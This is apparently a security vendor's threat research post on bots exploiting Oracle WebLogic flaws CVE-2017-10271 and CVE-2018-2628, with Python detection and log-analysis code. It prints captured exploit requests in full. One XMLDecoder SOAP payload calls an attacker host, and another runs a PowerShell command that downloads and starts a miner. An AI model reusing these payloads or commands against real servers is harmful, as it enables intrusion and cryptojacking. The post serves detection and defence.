
Weaponizing Oracle WebLogic Vulnerabilities


One of the many ongoing challenges faced by security operations center (SOC) analysts is making sense of (and, unfortunately, in many cases simply ignoring) the thousands of scanning events that probe their public internet-facing servers each day.

Famously, beginning with the Morris Worm and carrying forward to today’s Mirai and Reaper campaigns, threat actors have embraced botnets’ abilities to scan large blocks of attack surface and then opportunistically exploit machines where vulnerabilities exist. Last year’s WannaCry and Zealot campaigns are strong examples of how actors monetized this process via ransomware and miner payloads respectively.


Bots Scanning on TCP port 7001
The recent Oracle WebLogic vulnerabilities CVE-2017-10271 and CVE-2018-2628 are just another chapter in this story, as bots have already been observed attempting to weaponize them. Data from Grey Noise Intelligence (GNI) is extremely useful here to identify and establish the scale of this activity, which appears to be primarily targeting TCP port 7001 (the default Oracle WebLogic listen port).

Here are GNI’s complete lists of all source IP addresses scanning and connecting on TCP port 7001.  And with the ready availability of tools such as Shodan and Censys, it stands to reason that more targeted exploitation attempts are likely to occur (if not already happening) in the wild.

JASK ASOC currently tags this activity as “IP Address Scan – External” signals and also provides the ability to investigate these events more broadly via the Zeppelin notebook interface. The query below reveals all destination IP addresses that have been scanned for TCP port 7001. (Cross-correlating these scan results with successful connections in the ‘flows’ table is recommended, since a scan only proves interest; a completed handshake proves the listener is actually exposed.)
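The correlation recommended above, as an added example that is not JASK's Zeppelin query: a Python script that loads a few constructed scan signals and flow records into an in-memory SQLite database and joins them, so that only scanned hosts where a scanner completed a TCP handshake are reported as exposed. Table and column names (scans, flows, a Zeek-style conn_state) are assumptions; the scanner addresses are the three GNI sources quoted later on this page, and the internal destination addresses are made up.

```python
import sqlite3

# Constructed sample data (not JASK's). Scanner IPs are the GNI sources quoted on this
# page; the 10.0.5.x destinations are invented internal hosts.
SCANS = [
    # (src_ip, dst_ip, dst_port)  -- one row per "IP Address Scan - External" signal
    ("94.183.167.111", "10.0.5.20", 7001),
    ("94.183.167.111", "10.0.5.21", 7001),
    ("107.144.121.131", "10.0.5.20", 7001),
    ("219.91.233.184", "10.0.5.30", 7001),
    ("219.91.233.184", "10.0.5.30", 22),
]
FLOWS = [
    # (src_ip, dst_ip, dst_port, conn_state, resp_bytes)
    # conn_state uses Zeek's vocabulary: SF = full handshake and normal close,
    # REJ = SYN answered with RST, S0 = SYN never answered.
    ("94.183.167.111", "10.0.5.20", 7001, "SF", 1830),
    ("94.183.167.111", "10.0.5.21", 7001, "REJ", 0),
    ("107.144.121.131", "10.0.5.20", 7001, "SF", 2210),
    ("219.91.233.184", "10.0.5.30", 7001, "S0", 0),
]


def build_db() -> sqlite3.Connection:
    """Load the sample rows into an in-memory database with the assumed schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scans (src_ip TEXT, dst_ip TEXT, dst_port INTEGER)")
    conn.execute(
        "CREATE TABLE flows (src_ip TEXT, dst_ip TEXT, dst_port INTEGER, "
        "conn_state TEXT, resp_bytes INTEGER)"
    )
    conn.executemany("INSERT INTO scans VALUES (?, ?, ?)", SCANS)
    conn.executemany("INSERT INTO flows VALUES (?, ?, ?, ?, ?)", FLOWS)
    return conn


def scanned_destinations(conn, port=7001):
    """Every internal host that received a scan on `port`, with the number of distinct scanners."""
    return conn.execute(
        """
        SELECT dst_ip, COUNT(DISTINCT src_ip) AS scanners
        FROM scans
        WHERE dst_port = ?
        GROUP BY dst_ip
        ORDER BY dst_ip
        """,
        (port,),
    ).fetchall()


def exposed_destinations(conn, port=7001):
    """Scanned hosts where at least one scanner completed the handshake (conn_state = 'SF').

    A REJ or S0 flow means the port was closed or filtered; only SF rows prove that a
    WebLogic listener answered the scanner, which is what quantifies real exposure.
    """
    return conn.execute(
        """
        SELECT s.dst_ip, COUNT(DISTINCT f.src_ip) AS connected_scanners
        FROM scans s
        JOIN flows f
          ON f.src_ip = s.src_ip AND f.dst_ip = s.dst_ip AND f.dst_port = s.dst_port
        WHERE s.dst_port = ? AND f.conn_state = 'SF'
        GROUP BY s.dst_ip
        ORDER BY s.dst_ip
        """,
        (port,),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("scanned on 7001:", scanned_destinations(db))
    print("exposed on 7001:", exposed_destinations(db))
```

With the sample rows, three hosts were scanned but only 10.0.5.20 ever completed a handshake; 10.0.5.21 refused the connection and 10.0.5.30 never answered, so they drop out of the exposure list even though they appear in the scan list.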


Exploitation Attempts of Exposed Servers on TCP port 7001

Once a vulnerable machine is identified, actors move on to exploitation. The request and the two SOAP bodies below show attempts to exploit an Oracle WebLogic server via CVE-2017-10271, which abuses the WorkContext SOAP header: WebLogic hands its contents to java.beans.XMLDecoder, so the attacker can describe arbitrary objects to construct. The first body makes the server fetch an attacker URL (an out-of-band callback that confirms the target is exploitable); the second builds a java.lang.ProcessBuilder that launches PowerShell to download and run a miner.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: 46.101.48[.]196:7001
Content-Type: text/xml
Content-length: 2048
 
<soapenv:Envelope xmlns:soapenv="hXXp://schemas.xmlsoap[.]org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="hXXp://bea[.]com/2004/06/soap/workarea/">
            <java version="1.8" class="java.beans.XMLDecoder">
                <void id="url" class="java.net.URL">
                    <string>
                        http://51.254.219[.]134/oracleaudit.php?port=7001
                    </string>
                </void>
                <void idref="url">
                    <void id="stream" method="openStream" />
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
 
— AND —
 
<soapenv:Envelope xmlns:soapenv="hXXp://schemas.xmlsoap[.]org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="hXXp://bea[.]com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>cmd</string>
                        </void>
                        <void index="1">
                            <string>/c</string>
                        </void>
                        <void index="2">
                            <string>powershell (new-object System.Net.WebClient).DownloadFile('hXXp://down.kingminer[.]club/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
                        </void>
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
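To turn the two payloads above into something a SOC can detect, here is an added example (our code, not JASK's or Oracle's) that parses a POST body sent to /wls-wsat/ and flags any <java> element nested inside the WorkContext header, since that header is exactly what WebLogic hands to XMLDecoder. It then triages each finding by the classes the payload instantiates. The sample bodies are constructed from the captures above using the real SOAP and WorkContext namespace URIs (which the page defangs); the attacker hosts stay defanged.

```python
import xml.etree.ElementTree as ET

# Classes whose presence in an XMLDecoder payload means direct command execution.
EXEC_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}


def _local(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified tag names."""
    return tag.rsplit("}", 1)[-1]


def find_xmldecoder_payloads(body: str) -> list:
    """Return one finding per <java> element nested inside a WorkContext SOAP header.

    WebLogic passes the WorkContext header to java.beans.XMLDecoder, so every <java>
    block there is attacker-controlled object construction, whatever class attribute
    the <java> tag itself carries. Each finding records the classes instantiated and
    the literal strings (commands, URLs) an analyst will want to pivot on.
    Non-XML bodies yield no findings rather than an exception.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    findings = []
    for ctx in root.iter():
        if _local(ctx.tag) != "WorkContext":
            continue
        for java in ctx.iter():
            if _local(java.tag) != "java":
                continue
            classes = sorted({el.get("class") for el in java.iter()
                              if el is not java and el.get("class")})
            strings = [el.text.strip() for el in java.iter()
                       if _local(el.tag) == "string" and el.text]
            findings.append({"java_version": java.get("version"),
                             "classes": classes, "strings": strings})
    return findings


def classify(finding: dict) -> str:
    """Rough triage label describing what the payload does once XMLDecoder builds it."""
    classes = set(finding["classes"])
    if classes & EXEC_CLASSES:
        return "command-execution"
    if "java.net.URL" in classes:
        return "callback"      # out-of-band fetch, typically an exploitability check
    return "xmldecoder"        # some other gadget chain; still alert-worthy


def inspect_request(method: str, path: str, body: str) -> list:
    """Apply the check only to POSTs aimed at the WS-AT endpoints under /wls-wsat/."""
    if method != "POST" or not path.startswith("/wls-wsat/"):
        return []
    return [dict(f, verdict=classify(f)) for f in find_xmldecoder_payloads(body)]


# Constructed samples modelled on the captures above (namespaces un-defanged so they
# match what WebLogic expects; attacker hosts kept defanged).
CMD_EXEC_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>cmd</string></void>
            <void index="1"><string>/c</string></void>
            <void index="2"><string>powershell (new-object System.Net.WebClient).DownloadFile('hXXp://down.kingminer[.]club/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

URL_PROBE_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void id="url" class="java.net.URL">
          <string>
            hXXp://51.254.219[.]134/oracleaudit.php?port=7001
          </string>
        </void>
        <void idref="url"><void id="stream" method="openStream"/></void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# A legitimate SOAP call with no WorkContext header: must produce no finding.
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><ns:register xmlns:ns="urn:example"><ns:id>42</ns:id></ns:register></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for name, body in [("cmd", CMD_EXEC_BODY), ("url", URL_PROBE_BODY), ("benign", BENIGN_BODY)]:
        print(name, inspect_request("POST", "/wls-wsat/CoordinatorPortType", body))
```

The check is deliberately namespace-agnostic and does not require class="java.beans.XMLDecoder" on the <java> tag, because neither is what makes the request dangerous; the WorkContext header reaching XMLDecoder is. The callback variant is worth alerting on as loudly as the command-execution one: it is usually the scan that precedes the miner drop.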

In this exploit attempt, the miner downloader ‘downloader.exe’ was fetched from down[.]kingminer[.]club, a GoDaddy-registered domain hosted on 173.208.202[.]234. (Note: we were unable to locate this exact sample on public sandboxes, but a potentially related downloader.exe from the same delivery domain was submitted to reverse.it on April 21, 2018.) The download exchange follows; note the HFS (HTTP File Server) banner, a common choice for throwaway payload hosting.

GET /downloader.exe HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: down.kingminer[.]club
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 671744
Accept-Ranges: bytes
Server: HFS 2.3j
Set-Cookie: HFS_SID_=0.084782496560365; path=/; HttpOnly
ETag: F7723B04C3746136B7139F65E603ACBC
Last-Modified: Tue, 29 Aug 2017 10:13:50 GMT
Content-Disposition: attachment; filename=”Downloader.exe”;
MZ … This program cannot be run in DOS mode. … Rich … PE..L … .text … .rdata … .rsrc …
(Response body: a Windows PE executable; non-printable bytes of the DOS and PE headers omitted.)

Many of the same source IPs scanning and exploiting port 7001 have also incorporated the more recent Oracle WebLogic vulnerability CVE-2018-2628, a Java deserialization flaw reachable over WebLogic's proprietary T3 protocol on the same port. JASK’s Rod Soto demonstrates this remote code execution (RCE) in several proof-of-concept screenshots below, and exploit.py code is available on GitHub courtesy of brianwrf.

Activity related to this newer vulnerability has also been seen in the wild. The probes below were recently captured by Grey Noise Intelligence (GNI); each carries a base64-encoded T3 client hello, the opening message a T3 client (and the public exploit code) sends before any serialized payload.

{
  "timestamp": "2018-04-20 13:36:47",
  "protocol": "tcp",
  "source_ip": "94.183.167.111",
  "source_port": 39048,
  "destination_port": 7001,
  "size": 37,
  "timeout": true,
  "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoKAA=="
}
{
  "timestamp": "2018-04-20 22:35:19",
  "protocol": "tcp",
  "source_ip": "107.144.121.131",
  "source_port": 16677,
  "destination_port": 7001,
  "size": 36,
  "timeout": true,
  "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK"
}
{
  "timestamp": "2018-04-22 19:08:56",
  "protocol": "tcp",
  "source_ip": "219.91.233.184",
  "source_port": 32368,
  "destination_port": 7001,
  "size": 36,
  "timeout": true,
  "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK"
}
Decoded “data” (the first record's extra byte is a trailing null after the blank line, which is why its size is 37 rather than 36):
t3 12.2.1
AS:255
HL:19
MS:10000000
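As an added example that is not part of the original post: decoding these GNI records in Python, checking that the data field really is a T3 client hello, and pulling out the protocol version and the AS/HL/MS parameters. The three records are the ones shown above; a fourth record carrying an HTTP probe on the same port is constructed to show the negative case.

```python
import base64
import re

# The three GNI records quoted above (page data, trimmed to the fields used here).
GNI_PROBES = [
    {"timestamp": "2018-04-20 13:36:47", "source_ip": "94.183.167.111",
     "destination_port": 7001, "size": 37,
     "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoKAA=="},
    {"timestamp": "2018-04-20 22:35:19", "source_ip": "107.144.121.131",
     "destination_port": 7001, "size": 36,
     "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK"},
    {"timestamp": "2018-04-22 19:08:56", "source_ip": "219.91.233.184",
     "destination_port": 7001, "size": 36,
     "data": "dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK"},
]

# Constructed negative case (made up, not GNI data): "GET / HTTP/1.0\n\n" on port 7001.
NON_T3_PROBE = {"timestamp": "2018-04-23 00:00:00", "source_ip": "203.0.113.9",
                "destination_port": 7001, "size": 16,
                "data": "R0VUIC8gSFRUUC8xLjAKCg=="}

# T3 client hello: "t3 <version>\n" (or "t3s" over TLS), KEY:value lines, then a blank line.
# AS, HL and MS are the abbreviation-table size, header length and maximum message size
# the client proposes for the session.
T3_HELLO = re.compile(r"^t3s? (?P<version>\d+(?:\.\d+)*)\n(?P<fields>(?:[A-Z]{2}:\d+\n)*)\n")


def decode_t3_probe(record: dict):
    """Decode one GNI record; return the parsed hello, or None if it is not T3."""
    raw = base64.b64decode(record["data"])
    # Some clients append a null after the blank line; strip it before matching.
    text = raw.rstrip(b"\x00").decode("ascii", errors="replace")
    m = T3_HELLO.match(text)
    if m is None:
        return None
    fields = {}
    for kv in m.group("fields").split("\n"):
        if kv:
            key, value = kv.split(":", 1)
            fields[key] = int(value)
    return {
        "source_ip": record["source_ip"],
        "version": m.group("version"),
        "fields": fields,
        "trailing_null": raw.endswith(b"\x00"),
        "size_ok": len(raw) == record["size"],   # sanity check against GNI's size field
    }


def t3_probe_sources(records) -> list:
    """Sorted, de-duplicated source IPs that sent a T3 hello to the WebLogic port."""
    hits = [decode_t3_probe(r) for r in records if r.get("destination_port") == 7001]
    return sorted({h["source_ip"] for h in hits if h is not None})


if __name__ == "__main__":
    for rec in GNI_PROBES + [NON_T3_PROBE]:
        print(rec["source_ip"], decode_t3_probe(rec))
    print("T3 scanners:", t3_probe_sources(GNI_PROBES + [NON_T3_PROBE]))
```

The hello itself is harmless; what it buys the attacker is the server's reply, a HELO line carrying the WebLogic version, which the exploit uses to pick its payload before sending the serialized object. Seeing this hello from an external address that has no business speaking T3 to you is therefore an early indicator, ahead of any deserialization attempt.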

JASK expects to see significant exploitation of this vulnerability in the near future, similar to the widespread Muhstik exploitation of the Drupal vulnerability CVE-2018-7600.

Special thanks to Rod Soto (JASK) and Andrew Morris (GNI) for contributing to this research.


About JASK.AI

JASK is modernizing security operations to reduce organizational risk and improve human efficiency. Through technology consolidation, enhanced AI and machine learning, the JASK Autonomous Security Operations Center (ASOC) platform automates the correlation and analysis of threat alerts, helping SOC analysts focus on high-priority threats, streamline investigations and deliver faster response times.
